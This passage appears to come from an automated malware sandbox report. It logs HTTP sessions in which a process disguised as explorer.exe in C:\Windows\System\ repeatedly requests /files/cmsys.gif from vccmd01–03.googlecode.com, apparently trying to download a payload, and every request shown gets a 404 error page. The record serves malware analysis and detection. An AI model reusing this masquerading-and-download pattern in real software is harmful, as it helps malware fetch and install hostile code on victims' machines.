                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:43.750389099 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    111192.168.2.560774108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:43.945365906 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:44.869290113 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:44 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:44.869354010 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    112192.168.2.560775142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:45.069428921 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:46.933779001 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:45 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:46.933896065 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:46.933907032 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:46.934535980 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:45 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:46.937578917 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:45 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:46.941564083 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    113192.168.2.56077764.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:48.680671930 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:49.616764069 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:49 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:49.616823912 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    114192.168.2.560778108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:49.819255114 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:50.776967049 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:50 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:50.777324915 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    115192.168.2.560779142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:51.161753893 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:52.137080908 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
